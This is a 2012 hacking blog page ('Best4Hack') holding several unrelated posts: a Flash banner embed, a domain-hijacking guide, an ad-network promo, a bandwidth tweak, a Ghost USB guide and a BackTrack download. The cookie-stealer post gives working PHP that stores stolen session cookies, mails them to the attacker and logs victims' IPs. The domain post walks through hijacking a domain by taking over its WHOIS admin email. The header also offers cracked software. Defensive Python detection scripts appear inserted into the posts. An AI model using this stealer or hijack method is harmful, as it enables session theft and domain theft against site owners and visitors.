Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.



Sunday, 30 September 2012


Maybe you want to put a Flash banner on your blog to make it more interesting. A Flash banner is useful if you want to advertise something on the blog in the form of an animated banner, because Flash has been used extensively on web sites like this one.
Here's how to put a Flash banner on your blog:
First, you need to prepare the Flash file. You can make it using a web site that provides a free online banner maker.
Once the banner is ready, you need to upload it. Upload the banner to any web hosting and get the Flash banner's URL to put on the blog. You may also use Google Sites.

Steps to upload a file
1. You need to create an account on
2. Log in using your blog account, then on the dashboard click Create.
3. Under "Name your site", put the name of your site and enter the verification code below.
4. Then on the dashboard page click the new page icon at the top, put a name for
   your new page and click Create.
   After creating the page, click Add file, then browse and upload your Flash file.

After uploading your file, its name will appear above Add file. Click the icon to the right of the file and copy the link location. Save this link for the next step.
Example link is as below.

Inserting a flash file on the blog:

For the old dashboard:
on the dashboard page, choose design elements,
then add a gadget, then HTML / JavaScript.

For the new dashboard:
choose layout, then add a gadget,
select HTML / JavaScript
and enter the code below.

<embed src="YOUR_BANNER_URL" quality="high" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="" align="middle" height="150" width="150"></embed>

Replace YOUR_BANNER_URL (the src value) with your banner link.
The height and width values set the banner size.

Friday, 28 September 2012

How to Hijack Domain

Domain hijacking or domain theft is the act of changing the registration of a domain name without the permission of its original registrant.
This can be financially devastating to the original domain name holder, who may have derived commercial income from a website hosted at the domain or conducted business through that domain's e-mail accounts. Additionally, the hijacker can use the domain name to facilitate illegal activity such as phishing, where a website is replaced by an identical website that records private information such as log-in passwords.

Domain hijacking can be done in several ways, generally by exploiting a vulnerability in the domain name registration system or through social engineering.
The most common tactic used by a domain hijacker is to use acquired personal information about the actual domain owner to impersonate them and persuade the domain registrar to modify the registration information and/or transfer the domain to another registrar, a form of identity theft. Once this has been done, the hijacker has full control of the domain and can use it or sell it to a third party.
Responses to discovered hijackings vary; sometimes the registration information can be returned to its original state by the current registrar, but this may be more difficult if the domain name was transferred to another registrar, particularly if that registrar resides in another country. In some cases the original domain owner is not able to regain control over the domain.
The legal status of domain hijacking remains unclear. It is analogous with theft, in that the original owner is deprived of the benefits of the domain, but theft traditionally regards concrete goods such as jewelry and electronics, whereas domain name ownership is stored only in the digital state of the domain name registry, a network of computers. There are no specific laws regarding domain hijacking, nor any law that specifically holds the domain name registrar responsible for allowing the registrant information to be modified without the permission of the original registrant. In some cases there may be recourse under trademark law, but not all domain names are (or can be) registered as trademarks.

The operation of domain name is as follows

Any website say for example consists of two parts. The domain name ( and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel from which we have full control of the domain.
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
Mr. A registers a new domain “” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, JavaScript etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “” to point to his web server (of Y). Now whenever an Internet user types “”, the domain name “” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of  “”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case John’s domain name ( is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain. 
This information can be obtained from the WHOIS data of the target domain. To access the WHOIS data, go to, enter the target domain name and click on Lookup. Once the WHOIS data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.
Once the hacker takes full control of this email account, he will visit the domain registrar’s website and click on forgot password on the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done, all the details to reset the password will be sent to the administrative email address. Since the hacker has access to this email account, he can easily reset the password of the domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you lose this email account, you lose your domain. Protect your email account from being hacked. Another good way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for your domain name, he will not be able to find your name, phone and administrative email address. Private registration therefore provides extra security and protects your privacy. Private domain registration costs a bit extra but is well worth it for its advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.
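A hijack as described above shows up as a change in the registration data (registrar, administrative email) or in where the name points, so a domain owner can watch for it. The following is an added example, not code from the original post: it parses WHOIS text and compares it with a known-good baseline. The field labels, domain names, addresses and both sample records are constructed assumptions.

```python
import re

# Common WHOIS labels (assumption: real registries vary in wording and case).
FIELD_PATTERNS = {
    "registrar": re.compile(
        r"^\s*(?:Registrar|Registration Service Provided By)\s*:\s*(.+)$", re.I),
    "admin_email": re.compile(
        r"^\s*Admin(?:istrative Contact)? Email\s*:\s*(\S+)$", re.I),
    "name_servers": re.compile(r"^\s*Name Server\s*:\s*(\S+)$", re.I),
}

# How serious a change in each field is for the owner.
SEVERITY = {
    "registrar": "critical",    # domain moved to another registrar
    "admin_email": "critical",  # password resets now go to someone else
    "name_servers": "high",     # DNS is answered by different servers
    "addresses": "high",        # visitors land on a different web server
}

# Constructed sample records, not real WHOIS output.
BASELINE_WHOIS = """\
Domain Name: EXAMPLE.COM
Registrar: Example Registrar X, Inc.
Admin Email: admin@example.com
Name Server: NS1.HOST-Y.EXAMPLE
Name Server: NS2.HOST-Y.EXAMPLE
"""

OBSERVED_WHOIS = """\
Domain Name: EXAMPLE.COM
Registrar: Example Registrar X, Inc.
Admin Email: someone-else@example.net
Name Server: ns1.host-z.example
Name Server: ns2.host-z.example
"""


def parse_whois(text):
    """Extract registrar, admin email and name servers from WHOIS text."""
    record = {"registrar": None, "admin_email": None, "name_servers": set()}
    for line in text.splitlines():
        for field, pattern in FIELD_PATTERNS.items():
            match = pattern.match(line)
            if not match:
                continue
            value = match.group(1).strip()
            if field == "name_servers":
                # Host names are case-insensitive; normalise before comparing.
                record[field].add(value.lower().rstrip("."))
            elif record[field] is None:
                record[field] = value if field == "registrar" else value.lower()
            break
    return record


def snapshot(whois_text, addresses):
    """Combine parsed WHOIS data with the addresses the name resolves to."""
    record = parse_whois(whois_text)
    record["addresses"] = set(addresses)
    return record


def detect_drift(baseline, observed):
    """Return one finding per field that differs from the baseline."""
    findings = []
    for field, severity in SEVERITY.items():
        if baseline[field] != observed[field]:
            findings.append({
                "field": field,
                "severity": severity,
                "expected": baseline[field],
                "observed": observed[field],
            })
    return findings


if __name__ == "__main__":
    known_good = snapshot(BASELINE_WHOIS, ["192.0.2.10"])
    current = snapshot(OBSERVED_WHOIS, ["198.51.100.7"])
    for finding in detect_drift(known_good, current):
        print(finding["severity"].upper(), finding["field"],
              "expected", finding["expected"], "observed", finding["observed"])
```

With private registration the administrative email in WHOIS is a proxy address, but it is still stable, so a change in it remains a useful signal.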


Sunday, 16 September 2012

"Earn Money Online" With The Help of Social Websites

Hello guys, welcome to Best4Hack. Today I'm going to share a way to earn money online with the help of SociBuzz on social websites like Twitter, Facebook, YouTube and Google+. You can also publish it on Blogger, and there are many more social websites where you can publish it. With the help of this website you can earn from your Facebook account; you don't require any website of your own, because this website accepts traffic from social websites, and from this you can earn a good amount of money. promises to change the way companies advertise across all social media networks. It's a lofty goal, but they are well on their way.
SociBuzz is web-based social media advertising network that connects advertisers with eager publishers.
In short, = Social Media Advertising + Pay-Per-Click Marketing. recently cited that Social Media Spending is expected to reach 9.8 Billion by 2016. In the article it also stated that “Higher ad spending at Twitter, Facebook, and Linkedin boosted BIA/Kelsey’s forecast from six months ago.” It’s this reason that SociBuzz hopes to become the go to source for Advertisers who anxiously want to extend their social reach.
SociBuzz offers advertisers who are struggling to effectively spread their product, brand, service, or message a unique way to engage potential users. Michael Smith adds, “What makes SociBuzz great is that you can be a novice at social media and still effectively reach your desired audience. All you need is to set an attractive bid amount and our publishers will begin the promotion.” is not just a good deal for potential advertisers, but previously unreachable publishers can also get in on the action.
All you need to make money with SociBuzz is an account at any of the most popular social media profile such as Facebook or Twitter.
Juan Petrello (Sr. Project Manager) puts it like this; “Almost everyone has a social media profile somewhere. Facebook is expected to reach 1 billion users worldwide and all of those users are eligible to become a publisher for SociBuzz – the potential is enormous.”
The inspiration for SociBuzz came from a desire to create an easy to understand and open business model for both advertisers and publishers. SociBuzz is unique in this area because it has a very open policy for what advertisers are offering and what percentage of revenue publishers are earning. “We knew we could do better than the 2 other companies competing in this space!” says Michael. “One company leaves out the masses and is too exclusive and the other one is rife with bad reviews and claims of fraud. In the realm of Social Media, that doesn't make any sense at all.”
So who stands to benefit the most from SociBuzz?
There are several potential advertisers that could potentially leverage SociBuzz to make the most from it. When asked about this Juan states that “Politicians could help get their political message out. Since SociBuzz is a medium between the ‘advertisers’ and ‘publishers’ - a politician running for public office could easily recruit an army of publishers who would be willing to spread their message and reward them for doing so.

How can i increase my internet speed? answer!

People always ask how to increase their internet speed. Just follow the steps below to increase it a bit.

Step 1 : First of all Click on start button.

Step 2 : Select the run button from the start menu or type Run and click on it.

Step 3 : Type gpedit.msc

Step 4 : Expand the Administrative Templates branch

Step 5 : Now expand the Network branch

Step 6 : Click on QoS Packet Scheduler

Step 7 : Double click Limit reservable bandwidth

Step 8 : Select the Enabled option

Step 9 : Change bandwidth Limit to 0 %

Step 10: Click the Apply button and OK.

Step 11: Now restart your PC.

Step 12 : Check whether it is now better.

Step 13 : open this blog and subscribe if you have gained and tell your friends about this blog and the good it has done to you.

How to steal cookie, create a cookie .php to hack

Here is the simple Cookie Stealer code:
Cookie stored in File:
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
$cookie = $HTTP_GET_VARS["cookie"]; reads the cookie value from the current URL (stealer.php?cookie=x) and stores it in the $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This opens the cookie file in append mode so that the stolen cookie can be appended.

fwrite($steal, $cookie ."\\n"); This stores the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail  
$cookie = $HTTP_GET_VARS["cookie"]; mail("", "Stolen Cookies", $cookie);
The above code will mail the cookies to the hacker's mail address using the PHP mail() function with the subject "Stolen Cookies".

Third Version
function GetIP()
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
        $ip = "unknown";
function logData()
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
  The above Cookie stealer will store the following information:
  • IP address
  • port number
  • host(usually computer-name)
  • user agent
  • cookie

This Article is for Educational purpose only, written for Ethical Hackers. This article is for creating public awareness about the Internet Risks.
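From the defender's side, every script above receives the cookie in the query string of a request to another host (stealer.php?cookie=x), which is visible in an egress proxy log. The following is an added detection example, not code from the original post: the log format, host names, session cookie names and sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumptions: names of the session cookies your own applications set,
# and the hosts that are allowed to receive them.
SESSION_COOKIE_NAMES = ("PHPSESSID", "sessionid")
OWN_HOSTS = {"shop.example.com"}

# Constructed proxy log: timestamp, client IP, method, URL, status.
SAMPLE_LOG = """\
2012-09-16T10:00:01Z 10.0.0.21 GET http://shop.example.com/cart?item=42 200
2012-09-16T10:00:05Z 10.0.0.21 GET http://collector.example.net/stealer.php?cookie=PHPSESSID%3D9f2c4e1ab7d05566%3B%20theme%3Ddark 200
2012-09-16T10:00:09Z 10.0.0.34 GET http://cdn.example.org/banner.swf?size=150 200
2012-09-16T10:00:12Z 10.0.0.40 GET http://collector.example.net/x.php?PHPSESSID%253D77aa01bc 404
"""


def fully_unquote(text, max_rounds=3):
    """Percent-decode repeatedly, since the value may be encoded twice."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_cookie_exfil(log_text, cookie_names=SESSION_COOKIE_NAMES,
                      own_hosts=OWN_HOSTS):
    """Flag requests to foreign hosts whose query string carries one of our
    session cookies as name=value. The cookie value itself is never copied
    into the finding, so the alert does not leak the session a second time."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # not a line in the assumed format
        timestamp, client, _method, url, _status = parts
        target = urlsplit(url)
        host = (target.hostname or "").lower()
        if host in own_hosts:
            continue  # our own site legitimately sees its cookies
        query = fully_unquote(target.query)
        leaked = [
            name for name in cookie_names
            if re.search(r"(?:^|[=;&\s])" + re.escape(name) + r"=", query)
        ]
        if leaked:
            findings.append({
                "time": timestamp,
                "client": client,
                "destination": host,
                "path": target.path,
                "cookies": leaked,
            })
    return findings


if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(hit["time"], hit["client"], "->", hit["destination"] + hit["path"],
              "carried", ", ".join(hit["cookies"]))
```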

Create Ghost Bootable SD Card or USB Flash Drive

Binary Research developed Ghost in Auckland, New Zealand. After the Symantec acquisition, a few functions (such as translation into other languages) were moved elsewhere, but the main development remained in Auckland until October 2009 at which time much was moved to India. Technologies developed by 20/20 Software were integrated into Ghost after their acquisition by Symantec in April 2000.

Although disk cloning programs are not primarily backup programs, they are sometimes used as such. A key feature of a backup program is to allow the retrieval of individual files without needing to restore the entire backup. Disk cloning programs either provide a Windows Explorer-like program to browse image files and extract individual files from them, or allow an image file to be mounted as a read-only filesystem within Windows Explorer.
Ghost is marketed as a backup program. It comes with an ISO file that needs to be written to a CD. This provides a recovery environment to perform a full system recovery. There is also provision to mount a drive and select backed-up files from that drive and recover them to the primary hard disk.
Ghost can copy the contents of one hard drive to another and can convert a hard drive′s contents to a virtual disk format such as VMware′s VMDK file.

It's a good practice to create an image of your hard drive before you start using it. Especially when you had to build that computer from scratch and spent hours installing the operating system and all of your favorite apps...

As Symantec Ghost becomes more user friendly, people start to recognize this idea. The idea also works well when you need to clean your PC from viruses. In case anything goes wrong with the operating system, you just need to restore the image using the Symantec bootable CD.

However, the problem comes when we deal with the new generation of small laptops, the netbooks, which usually don't come with a built-in CD-ROM drive to boot up the PC.
The simplest solution would be buying an external CD-ROM drive, which costs you money. And in some cases, you just want to boot up Symantec Ghost with whatever is available!

Almost every recent laptop/netbook comes with a card reader, and even if you weren't lucky enough, your laptop/netbook should have a USB port!

This guide will tell you how to create a bootable SD card or a USB flash drive with Symantec Norton Ghost.
This task can be done with several different versions of Symantec Ghost; however, the steps in this article are based on Symantec Ghost 14.

What you need?
  • Symantec Ghost 14 bootable CD. (Some other versions might also work)
  • A PC with bootable CD/DVD drive.
  • An SD card (either SD or SDHC), or a USB thumb drive. The size can be as minimum as 1 GB. You can also pick a large SD card if you want to store your hard drive image to the card as well.
  • An SD slot or a card reader (for SD card) or a USB slot (for thumb drive) 
Follow the steps in order. Use this guide at your own risk.

  1. First, check to make sure your CD/DVD drive is bootable. (See your BIOS manual or PC user guide for details since this is out of the scope of this article).
  2. - For SD card: Make sure the SD slot or the card reader is available. If it's a card reader, connect it to the PC. Also insert the card.
    - For USB thumb drive: Make sure the drive is inserted into one of the USB slots.
  3. Boot up the computer using the Symantec Ghost CD (Details vary on different computers). On Windows XP, during the startup, you should see the prompt "Press any key to boot from CD...".
  4. Once the Symantec Recovery startup is complete, you should see the main screen of Symantec Ghost 14 Recovery similar to this image:

  5. Select "Analyze" from the left menu.

  6. Then click on "Open Command Shell Window". A command prompt window will display.

  7. At this command prompt window, type: "diskpart" (one word, without quotes) and hit enter. The prompt now changes to "DISKPART>"

  8. Now type "list disk" and hit enter. You should now see a list of all available disks. Based on the size of each disk listed, find the one that matches your SD card (or thumb drive) and note its disk number under "Disk ###". If you don't see your SD card (or flash drive) listed, verify that it is inserted or plugged in (you might need to restart the computer and try again).

  9. Type "select disk <n>" (replace <n> with the disk # noted from the previous step) then hit enter.
    Important!! Be sure to select the correct disk (your SD card or thumb drive) as you will be erasing the drive.
    Sample image with a 4-GB SD selected:

  10. Create a primary partition for the disk by executing the following sequence of commands:
    create partition primary
    select partition 1

  11. Set the primary partition active, type: "active" and hit enter

  12. Perform a quick format with the following command:
    format fs=fat32 quick

  13. Then type:

  14. Your SD card (or the flash drive) is now bootable and will act similar to a local hard drive. In order to boot this card with Symantec Ghost Recovery, copy all contents from the Symantec Ghost disc to the SD card (or the flash drive). Be sure to copy everything including any hidden files/folders.

    The SD card or flash drive is now bootable and will boot your laptop/netbook to Symantec Ghost Recovery utilities exactly the same way as of the CD (To boot with the card on your laptop/netbook, don't forget to set your bios to search for the SD card or USB external devices in the boot sequence).

Version history

Ghost 3.1

The first versions of Ghost supported only the cloning of entire disks, however version 3.1 in 1997 allowed the cloning of individual partitions. Ghost could clone a disk or partition to another disk or partition or to an image file. Ghost allowed for writing a clone or image to a second disk in the same machine, another machine linked by a parallel or network cable, a network drive, or to a tape drive.

Ghost 4.0 and 4.1

Version 4.0 of Ghost added multicast technology, following the lead of a competitor, ImageCast. Multicasting allows sending a single backup image simultaneously to other machines without putting greater stress on the network than by sending an image to a single machine. This version also introduced Ghost Explorer, a Windows program which allowed a user to browse the contents of an image file and extract individual files from it. Explorer was subsequently enhanced to allow users to add and delete files on FAT, later on ext2, ext3 and NTFS filesystems in an image. Until 2007, Ghost Explorer could extract files from NTFS images but not edit NTFS images. Ghost Explorer could work with images from older versions but only slowly; version 4 images contained indexes to find files rapidly. Version 4.0 also moved from real-mode DOS to 286 protected-mode. The additional memory available allowed Ghost to provide several levels of compression for images, and to provide the file browser. In 1998, Ghost 4.1 allowed for password-protected images.

Ghost 5.0

Version 5.0 moved to 386 protected mode. Unlike the character-based user interface of earlier versions, 5.0 used a GUI. The Binary Research logo, two stars revolving around each other, played on the main screen while the program idled. In 1998 Gdisk, a script based partition manager, was integrated in Ghost. Gdisk serves a role similar to Fdisk, but has greater capabilities.

Ghost for NetWare

There was also a Norton Ghost version (called 2.0) for Novell NetWare around 1999, with supported NSS partitions (although it ran in DOS, like the others).

Ghost 6.0 (Ghost 2001)

Ghost 6.0 included a Console application in 2000 to simplify the management of large numbers of machines. The Console communicates with client software on managed computers to allow a system administrator to refresh the disk of a machine remotely.
As a DOS-based program, Ghost required machines running Windows to reboot to a DOS environment to run it. Ghost 6.0 required a separate DOS partition when used with the Console.

Ghost 7.0 / Ghost 2002

Released March 31, 2001 Norton Ghost version 7.0 (retail) was marketed as Norton Ghost 2002 Personal Edition. Help|About reveals version 7.00.

Ghost 7.5

Released December 14, 2001
Ghost 7.5 in 2002 created a ‘Virtual Partition’ instead – a DOS partition which actually exists as a file within a normal Windows filesystem. This significantly eased systems management because the user no longer had to set up their own partition tables. Ghost 7.5 could also write images to CD-R drives, and later versions can also write DVDs.

Symantec Ghost 8.0

Ghost 8.0 includes a standalone executable (filename: ghost32.exe) that runs directly from Windows, without the need to reboot. It is very well-suited for placement on bootable media, such as BartPE′s bootable CD. The Corporate edition supports Unicast, Multicast and peer-to-peer transfers via TCP/IP. Ghost 8.0 also allows an image to be saved on, or read from, an NTFS filesystem, although NTFS is not normally accessible from a DOS program.

Norton Ghost 2003

Norton Ghost 2003, a consumer edition of Ghost, was released on September 6, 2002. Available as an independent product, Norton Ghost 2003 was also included as a component of Norton SystemWorks 2003 Professional. A simpler, non-corporate version of Ghost, Norton Ghost 2003 does not include the Console but has a Windows front-end to script Ghost operations and create a bootable Ghost diskette (third-party CD burning software can be used to create a bootable Ghost CD based on a bootable Ghost diskette). The machine still needs to reboot to the Virtual Partition, but the user doesn′t need to interact with DOS. Symantec deprecated LiveUpdate support for Norton Ghost 2003 in early 2006.

Symantec Ghost Solution Suite 1.0 (Ghost 8.2)

Symantec Ghost 8.2
In 2004, Symantec renamed the Enterprise version of Ghost to Symantec Ghost Solution Suite 1.0. This helped to clarify the difference between the consumer and business lines of the product. This was further defined in February 2006, with the Release of Norton Save And Restore (some packages are labelled Norton Backup And Restore), a standalone backup application based on Ghost 10.0.
Released November 15, 2004

Symantec Ghost Solution Suite 1.1 (Ghost 8.3)

Ghost Solution Suite 1.1 was released December 2005. Some of the new features include the ability to create an image file that is larger than 2 GB (in Ghost 8.2 or earlier versions, such image files are automatically split into two or more segments, so that each segment has a maximum size of 2 GB), more comprehensive manufacturing tools, and the ability to create a universal boot disk. Ghost Solution Suite is a bundle of an updated version of Ghost, Symantec Client Migration (a user data and settings migration tool) and the former PowerQuest equivalent, DeployCenter (using PQI images).

Norton Ghost 9.0 (includes Ghost 2003)

A screen shot of Norton Ghost 9.0 as seen in Windows 2000
Ghost 9.0 was released August 2, 2004. It represents a significant shift in the consumer product line from Ghost 2003, in several ways:
  • It uses a totally different code base, based on the DriveImage/V2i Protector product via Symantec′s acquisition of PowerQuest.
  • The main product is a Windows-based application that must be installed on the target system.
  • Images of the system can be made while Windows is running, rather than only when booted directly into DOS-mode Ghost.
  • Incremental images (containing only changes since the last image) are supported.
  • The Windows application requires Product Activation in order to function fully.
  • The bootable environment on the Ghost 9 CD is only useful for recovery of existing backups – it cannot be used to create new images.
Since the DriveImage-based Ghost 9 did not support the older .gho format disk images, a separate CD containing Ghost 2003 was included in the retail packaging for users needing to access those older images.
The limitations of Ghost 9 compared to Ghost 2003 were not well communicated by Symantec, and resulted in many dissatisfied customers who purchased Ghost 9 expecting the previous version′s features (like making images from the bootable Ghost environment, no installation required, and no product activation).

Norton Ghost 10.0

Supported media: CD-R/RW and DVD+-R/RW drives, USB and FireWire (IEEE 1394) devices, and Iomega Zip and Jaz drives. Enables the encryption of backups and support for Maxtor external drives with Maxtor OneTouch buttons. Ghost version 10.0 is compatible with previous revisions, but not with future revisions.

Norton Save And Restore 1.0 (Ghost 10.0)

Norton Save And Restore 1.0, released February 2006, was the renamed consumer version of Ghost. The system utilized Ghost 10.0′s engine, with the addition of features to allow backup and restoration of individual files.

Symantec Ghost Solution Suite 2.0 (Ghost 11.0)

Ghost Solution Suite 2.0 was released in November 2006. This version provides significant improvements in performance, as well as the ability to edit NTFS images. This version also adds support for Windows Vista, x64 versions of Windows, and GUID Partition Table (GPT)-based disks (although the software does not yet fully support systems with Extensible Firmware Interface (EFI)-compliant firmware). Running Live Update from Ghost Explorer will update Ghost to
Ghost 11.0 supported image formats to save and restore: *.GHO, *.GHS, *.IMG, *.RAW

Norton Ghost 12.0

Ghost 12.0 includes Windows Vista support with an updated and more thorough user interface. It allowed for a full system backup & one where individual files or folders can be selected & backed up.
This version also provided a “LightsOut Restore” feature. This restored a system with an on-disk software recovery environment, thereby allowing a recovery without a bootable CD. Upon computer boot-up, a screen will ask which drive to boot from, the regular drive, or the LightsOut restore virtual drive.
LightsOut restore would augment the ISO disk, which came with the Ghost program, that had to be burned to a CD. That contained a recovery environment that allowed one to recover files even if Windows didn′t start up, but the computer could turn on. The latest update to that program was

Norton Save & Restore 2.0 (Ghost 13.0)

NSR 2.0 has fewer features when compared to Norton Ghost 12. NSR 2.0 offers one-time backups, file and folder backup, simplified schedule editor, Maxtor OneTouch integration and modifiable Symantec recovery disc.
This version also supports 32-bit and 64-bit versions of Windows XP and Vista.

Norton Ghost 14.0

The window where you can set Norton Ghost to automatically back up a drive based upon the level of global computer based threats, as judged by Symantec′s ThreatCon grading system.
Version 14.0 preserves the features of version 12.0, with the ability to make full Volume Snapshot Service (VSS) backups and the option to make remote backups to an FTP site as another storage option. Ghost also leverages data from ThreatCon, which monitors malware activity around the world, and performs incremental backups when a specific threat level is reached. However, this functions only when connected to the Internet, so it will not resist any local attack.
Other features include the ability to back up to Network-attached storage devices and support of NTFS partitions up to 16TB. Ghost can manage other installations of version 12.0 or later across a network. Version 14 supports XP and Vista. The latest version is This version no longer supports opening of older version .gho image files. Rather, it stores images in .v2i format. Incremental backup images created with Norton Ghost are saved with the file extension .IV2I on a regular basis after the initial volume backup (.V2I). The .iv2i file must be saved along with the initial .v2i backup file in order to function correctly. Older .gho image files can be restored using Ghost Explorer, a separate utility.

Symantec Ghost Solution Suite 2.5

This is the current version of the enterprise software, and includes Ghost 11.5. It was released in May 2008. New features include DeployAnywhere, Hot Imaging, logical volume support, additional image formats, and new PreOS (boot disk) operating systems. As of January 6, 2010, the latest build from Live Update is (Live Update 5 (LU5)). This update provides support for Windows 7 and 2008 R2. Furthermore Ghost 11.5 is compatible with BartPE's bootable CD using a PE Builder plug-in for Symantec Ghost 11.
Ghost 11.5 supported image formats to save: *.GHO, *.GHS, *.VMDK
Ghost 11.5 supported image formats to restore: *.GHO, *.GHS, *.VMDK, *.V2I, *.IV2I, *.PQI
  • Improved support for virtual formats
New features:
  • DeployAnywhere: Allows drivers to be injected during image deployment to lessen the need for hardware dependent images.
  • Hot Imaging: Allows live machines to be used as the source to keep images from becoming stale and out of date.
  • Image Formats
  • PreOS (boot disk) operating systems

Norton Ghost 15.0

Ghost was updated in November 2009 to v15.0.0.35659. According to the manual on Symantec's site, the following features are available in Ghost 15:
Improved support for virtual formats: Norton Ghost now includes support for the following virtual platforms:
  • VMware ESX 3.5i and 4.0i
  • VMware ESX 3.5 and 4.0
Improved platform support: Norton Ghost now includes support for the following platforms:
  • Windows 7
  • Windows Vista with SP2 (includes Home Basic, Home Premium, Business-Retail, and Ultimate)
  • BitLocker-encrypted volume support
Create recovery points from within Symantec Recovery Disk: You can now create independent recovery points using the new Back Up My Computer feature in Symantec Recovery Disk. Sometimes known as a cold backup or offline backup, you can create recovery points of a partition without the need to install Norton Ghost or its Agent.
Convert recovery points to virtual disks using a schedule: You can now create schedules to convert recovery points to VMware Virtual Disk and Microsoft Virtual Disks, or directly to a VMware ESX 3.5 server.
Support for Microsoft Hyper-V: You can now convert recovery points to Hyper-V format and also import recovery points to a Hyper-V server.
Support for Blu-ray disc media: Back up your computer directly to Blu-ray, DVD, or CD. Or, you can copy recovery points to Blu-ray, DVD, or CD.
30-day trial: If you choose to delay installation of the product license, all features will not be enabled during the 30-day trial period. The 30-day trial period begins when you do a particular task.
On April 1, 2010 an updated version of Norton Ghost 15 was released. The current version is

Thursday, 13 September 2012

Backtrack 5 Free Download

BackTrack 5 Free Download | What is BackTrack | Download BackTrack


Click Here to Download BackTrack 5 For free 

Before giving the free download link, I would first like to tell you what BackTrack is. I know many of you might already be aware of it, but there are still many more who aren't.

What is BackTrack:-

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Whether you install BackTrack or boot it from a Live DVD or thumbdrive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.
Feedback from all industries and skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both commercially and freely available. The project is funded by Offensive Security. Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs.
Enough information about BackTrack.
I know many of you might be thinking, just bring on the link to download BackTrack 5 free.
Well, your wait is over.


The BackTrack distribution originated from the merger of two formerly competing distributions which focused on penetration testing:
  • WHAX: a Slax based Linux distribution developed by Mati Aharoni, a security consultant. Earlier versions of WHAX were called Whoppix and were based on Knoppix.
  • Auditor Security Collection: a Live CD based on Knoppix developed by Max Moser which included over 300 tools organized in a user-friendly hierarchy.
The overlap with Auditor and WHAX in purpose and in their collection of tools partly led to the merger.


